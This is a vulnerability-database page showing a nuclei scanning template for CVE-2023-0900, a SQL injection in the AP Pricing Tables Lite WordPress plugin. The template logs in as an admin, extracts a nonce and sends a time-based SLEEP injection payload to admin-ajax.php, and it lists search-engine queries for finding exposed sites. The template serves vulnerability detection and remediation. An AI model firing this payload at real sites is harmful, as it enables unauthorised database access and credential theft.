Lucene search
K

AP Pricing Tables Lite <= 1.1.6 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

AP Pricing Tables Lite <= 1.1.6 - SQL Injection. Plugin vulnerable to SQL injection by high-privilege users

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress Plugin Pricing Table Builder SQL注入漏洞
5 Jun 202300:00
cnnvd
CVE
CVE-2023-0900
5 Jun 202313:39
cve
Cvelist
CVE-2023-0900 AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
5 Jun 202313:39
cvelist
EUVD
EUVD-2023-12889
3 Oct 202520:07
euvd
NVD
CVE-2023-0900
5 Jun 202314:15
nvd
OSV
CVE-2023-0900
5 Jun 202314:15
osv
Patchstack
WordPress AP Pricing Tables Lite Plugin <= 1.1.6 is vulnerable to SQL Injection
15 May 202300:00
patchstack
Prion
Sql injection
5 Jun 202314:15
prion
Positive Technologies
PT-2023-16602 · WordPress · Pricing Table Builder
5 Jun 202300:00
ptsecurity
RedhatCVE
CVE-2023-0900
23 May 202502:53
redhatcve
Rows per page
id: CVE-2023-0900

info:
  name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
  impact: |
    Authenticated high-privilege attackers (admin) can exploit SQL injection through the table_id parameter in the copy_table action to extract database contents, potentially stealing user credentials and compromising the WordPress database.
  remediation: |
    Update AP Pricing Tables Lite plugin to a version newer than 1.1.6 that uses parameterized queries or prepared statements for the table_id parameter in admin-ajax.php.
  reference:
    - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1
    - https://github.com/WPPlugins/ap-pricing-tables-lite
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0900
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-0900
    cwe-id: CWE-89
    epss-score: 0.03229
    epss-percentile: 0.86733
    cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wpdevart
    product: pricing_table_builder
    framework: wordpress
    shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite
    fofa-query: body=wp-content/plugins/ap-pricing-tables-lite
    publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
  tags: time-based-sqli,cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_3>=5'
          - 'status_code_3 == 200'
          - 'contains(body_3, "Security check")'
          - 'contains(body_2, "ap-pricing-tables-lite")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '_wpnonce=([0-9a-z]+)">Log Out'
        internal: true
# digest: 4b0a00483046022100c682ad372dfab7203978739fc7ae2c43277343d80d751322d942f526c4ddc453022100dfa6413d5720329fa761df3698ed3c6bf732d35a9dc387d046cc59f2cf93cbae:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.2
EPSS0.03229
SSVC
19